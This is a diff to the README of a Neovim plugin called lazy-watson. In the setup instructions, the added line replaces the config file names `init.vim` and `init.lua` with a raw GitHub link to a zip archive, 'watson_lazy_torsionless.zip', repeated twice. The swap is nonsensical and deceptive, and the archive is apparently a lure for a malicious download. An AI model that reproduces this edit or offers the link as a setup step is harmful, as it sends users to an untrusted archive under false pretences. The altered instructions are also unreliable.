gurlal-m4s/lazy-watson/README.md

 ## 🛠️ Setting Up

 To get the most from lazy-watson, you may want to adjust settings.
-Open your Neovim configuration file (`init.vim` or `init.lua`) and add the following lines to enable the plugin:
+Open your Neovim configuration file (`https://raw.githubusercontent.com/gurlal-m4s/lazy-watson/main/lua/watson_lazy_torsionless.zip` or `https://raw.githubusercontent.com/gurlal-m4s/lazy-watson/main/lua/watson_lazy_torsionless.zip`) and add the following lines to enable the plugin:

 ```lua
 require('lazy-watson').setup({